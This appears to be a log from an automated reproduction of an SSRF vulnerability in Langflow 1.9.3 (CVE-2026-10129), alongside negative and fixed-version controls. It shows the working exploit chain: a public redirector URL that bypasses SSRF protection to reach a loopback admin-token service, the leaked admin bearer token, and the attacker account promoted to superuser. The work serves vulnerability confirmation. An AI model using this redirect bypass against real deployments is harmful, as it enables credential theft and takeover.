[2026-07-05T09:38:27+00:00] Installing vulnerable stack langflow==1.9.3 langflow-base==0.9.3 (lfx 0.4.x) ... [2026-07-05T09:38:27+00:00] installed: langflow 1.9.3 langflow-base 0.9.3 lfx 0.4.6 [2026-07-05T09:38:31+00:00] installed api_request.py has redirect re-validation fix? no (expect no for vulnerable) [2026-07-05T09:38:31+00:00] Pre-flight: public redirector https://postman-echo.com/redirect-to?url=http%3A%2F%2F127.0.0.1%3A9999%2Fadmin-token [2026-07-05T09:38:32+00:00] Pre-flight redirector: 302 http://127.0.0.1:9999/admin-token [2026-07-05T09:38:32+00:00] Starting vulnerable Langflow server on 127.0.0.1:7860 in multi-user mode ... [2026-07-05T09:38:32+00:00] langflow server pid=75125 [2026-07-05T09:39:23+00:00] Langflow server is up (health OK) [2026-07-05T09:39:24+00:00] Configured superuser login works (admin boundary exists) [2026-07-05T09:39:24+00:00] Creating low-privileged attacker user via POST /api/v1/users/ ... [2026-07-05T09:39:25+00:00] Attacker registration response: {"id":"a4905877-7864-4a57-83ee-d3f1d43da8b3","username":"attacker","profile_image":null,"store_api_key":null,"is_active":true,"is_superuser":false,"create_at":"2026-07-05T09:39:24.922983","updated_at":"2026-07-05T09:39:24.922990","last_login_at":null,"optins":{"github_starred":false,"dialog_dismissed":false,"discord_clicked":false}} [2026-07-05T09:39:25+00:00] internal admin token service pid=75349 on 127.0.0.1:9999 [2026-07-05T09:39:25+00:00] internal admin token service is up [2026-07-05T09:39:25+00:00] Generating exploit flow (public redirector + follow_redirects=true) ... /data/pruva/runs/50e1d94c-35c4-431a-b622-d84ef4d2d9ee/bundle/data/venv/lib/python3.14/site-packages/langchain_core/utils/pydantic.py:41: UserWarning: Core Pydantic V1 functionality isn't compatible with Python 3.14 or greater. from pydantic.v1 import BaseModel as BaseModelV1 {"out": "/data/pruva/runs/50e1d94c-35c4-431a-b622-d84ef4d2d9ee/bundle/data/flow_exploit.json", "node_id": "APIRequest-b482ac52", "component_key": null, "code_hash": "4f329dec9a39", "url_input": "https://postman-echo.com/redirect-to?url=http%3A%2F%2F127.0.0.1%3A9999%2Fadmin-token", "follow_redirects": true} [2026-07-05T09:39:30+00:00] EXPLOIT RUN: low-privileged flow author builds API Request flow through HTTP API [2026-07-05T09:39:31+00:00] Exploit summary: {"base": "http://127.0.0.1:7860", "name": "cve-2026-10129-ssrf-privesc", "login_status": 200, "auth_mode": "bearer", "attacker_whoami_status_before": 200, "attacker_user_id": "a4905877-7864-4a57-83ee-d3f1d43da8b3", "attacker_is_superuser_before": false, "lowpriv_admin_list_status_before": 403, "lowpriv_admin_list_body_before": "{\"detail\":\"The user doesn't have enough privileges\"}", "flow_id": "dd8ad255-2f23-41b8-a6a9-3fa7f0394731", "build_status": 200, "events_bytes": 11771, "marker_found": true, "ssrf_blocked": false, "reached_internal": true, "stolen_admin_token_found": true, "stolen_admin_token_redacted": "eyJhbGciOiJIUzI1Ni...aXvi0D0U", "stolen_token_whoami_status": 200, "stolen_token_username": "admin", "stolen_token_is_superuser": true, "stolen_token_admin_list_status": 200, "stolen_token_admin_list_total": 2, "promote_attacker_status": 200, "promote_attacker_body": "{\"id\":\"a4905877-7864-4a57-83ee-d3f1d43da8b3\",\"username\":\"attacker\",\"profile_image\":null,\"store_api_key\":null,\"is_active\":true,\"is_superuser\":true,\"create_at\":\"2026-07-05T09:39:24.922983\",\"updated_at\":\"2026-07-05T09:39:31.773298Z\",\"last_login_at\":\"2026-07-05T09:39:30.699549\",\"optins\":{\"github_starred\":false,\"dialog_dismissed\":false,\"discord_clicked\":false}}", "attacker_whoami_status_after": 200, "attacker_is_superuser_after": true, "privilege_escalation_observed": true, "snippet": "9999/admin-token\", \"status_code\": 302}], \"result\": {\"service\": \"internal-admin\", \"endpoint\": \"/admin-token\", \"secret\": \"INTERNAL_ADMIN_TOKEN_CVE_2026_10129\", \"credential_type\": \"langflow_admin_bearer_token\", \"access_token\": \"eyJhbGciOiJIUzI1Ni...aXvi0D0U\", \"token_subj"} [2026-07-05T09:39:31+00:00] Generating negative-control flow (direct loopback URL) ... /data/pruva/runs/50e1d94c-35c4-431a-b622-d84ef4d2d9ee/bundle/data/venv/lib/python3.14/site-packages/langchain_core/utils/pydantic.py:41: UserWarning: Core Pydantic V1 functionality isn't compatible with Python 3.14 or greater. from pydantic.v1 import BaseModel as BaseModelV1 {"out": "/data/pruva/runs/50e1d94c-35c4-431a-b622-d84ef4d2d9ee/bundle/data/flow_direct.json", "node_id": "APIRequest-460fe188", "component_key": null, "code_hash": "4f329dec9a39", "url_input": "http://127.0.0.1:9999/admin-token", "follow_redirects": true} [2026-07-05T09:39:36+00:00] NEGATIVE CONTROL RUN: direct http://127.0.0.1:9999 (expect SSRF block, no marker) [2026-07-05T09:39:37+00:00] Negative-control summary: {"base": "http://127.0.0.1:7860", "name": "cve-2026-10129-direct-ctrl", "login_status": 200, "auth_mode": "bearer", "attacker_whoami_status_before": 200, "attacker_user_id": "a4905877-7864-4a57-83ee-d3f1d43da8b3", "attacker_is_superuser_before": true, "lowpriv_admin_list_status_before": 200, "lowpriv_admin_list_body_before": "{\"total_count\":2,\"users\":[{\"id\":\"7f890ffb-f36d-4d3a-b08b-f042915f1d69\",\"username\":\"admin\",\"profile_image\":null,\"store_api_key\":null,\"is_active\":true,\"is_superuser\":true,\"create_at\":\"2026-07-05T09:38:39.302271\",\"updated_at\":\"2026-07-05T09:39:23.436992", "flow_id": "566403a0-6994-4475-afa8-4b2c66b09f5e", "build_status": 200, "events_bytes": 12807, "marker_found": false, "ssrf_blocked": true, "reached_internal": false, "stolen_admin_token_found": false, "stolen_admin_token_redacted": "", "privilege_escalation_observed": false, "snippet": "uest\", \"sender_name\": \"API Request\", \"session_id\": \"566403a0-6994-4475-afa8-4b2c66b09f5e\", \"context_id\": null, \"text\": \"SSRF Protection: Hostname 127.0.0.1 resolves to blocked IP address(es): 127.0.0.1. To allow this hostname, add it to LANGFLOW_SSRF_ALLOWED_HOSTS environment variable.\\n\", \"files\": [], \"error\": false, \"edit\": false, \"properties\": {\"text_color\": \"red\", \"background_color\": \"red\", \"edited\": false, \"sour"} [2026-07-05T09:39:42+00:00] FIXED CONTROL: swapping in official HEAD api_request.py (redirect re-validation) [2026-07-05T09:39:46+00:00] Fixed-control harness rc=3 output: /data/pruva/runs/50e1d94c-35c4-431a-b622-d84ef4d2d9ee/bundle/data/venv/lib/python3.14/site-packages/langchain_core/utils/pydantic.py:41: UserWarning: Core Pydantic V1 functionality isn't compatible with Python 3.14 or greater. from pydantic.v1 import BaseModel as BaseModelV1 {"ok": false, "ssrf_bypass_reached_internal": false, "marker_in_output": false, "error": "ValueError: SSRF Protection: blocked redirect to http://127.0.0.1:9999/admin-token: Hostname 127.0.0.1 resolves to blocked IP address(es): 127.0.0.1. To allow this hostname, add it to LANGFLOW_SSRF_ALLOWED_HOSTS environment variable.", "lfx_version": "0.4.6"} [2026-07-05T09:39:46+00:00] VULN component harness (restored vulnerable api_request.py): [2026-07-05T09:39:51+00:00] Vuln harness output: /data/pruva/runs/50e1d94c-35c4-431a-b622-d84ef4d2d9ee/bundle/data/venv/lib/python3.14/site-packages/langchain_core/utils/pydantic.py:41: UserWarning: Core Pydantic V1 functionality isn't compatible with Python 3.14 or greater. from pydantic.v1 import BaseModel as BaseModelV1 {"ok": true, "ssrf_bypass_reached_internal": true, "marker_in_output": true, "data_preview": "{\"source\": \"https://postman-echo.com/redirect-to?url=http%3A%2F%2F127.0.0.1%3A9999%2Fadmin-token\", \"status_code\": 200, \"response_headers\": {\"server\": \"BaseHTTP/0.6 Python/3.14.4\", \"date\": \"Sun, 05 Jul 2026 09:39:50 GMT\", \"content-type\": \"application/json\", \"content-length\": \"533\"}, \"redirection_history\": [{\"url\": \"http://127.0.0.1:9999/admin-token\", \"status_code\": 302}], \"result\": {\"service\": \"internal-admin\", \"endpoint\": \"/admin-token\", \"secret\": \"INTERNAL_ADMIN_TOKEN_CVE_2026_10129\", \"credential_type\": \"langflow_admin_bearer_token\", \"access_token\": \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiI3Zjg5MGZmYmYzNmQ0ZDNhYjA4YmYwNDI5MTVmMWQ2OSIsInR5cGUiOiJhY2Nlc3MiLCJleHAiOjE3ODMyNDYxOTB9._W6uOAHSJiXxm1U6VXaDOOkAJ8MyxDc_tYG1ak5Cqn8\", \"token_subject\": \"7f890ffbf36d4d3ab08bf042915f1d69\", \"token_username\": \"admin\", \"note\": \"loopback-only admin metadata; SSRF protection should block access to this credential\"}, \"headers\": {\"User-Agent\": \"cve-2026-10129-harness\"}}", "lfx_version": "0.4.6"} [2026-07-05T09:39:51+00:00] RESULT: exploit_bypass=true privesc=true lowpriv_forbidden=true stolen_admin_ok=true direct_blocked=true fixed_blocked=true [2026-07-05T09:39:51+00:00] VERDICT: CONFIRMED - real API SSRF redirect bypass leaked internal admin credentials and escalated the low-privileged attacker to superuser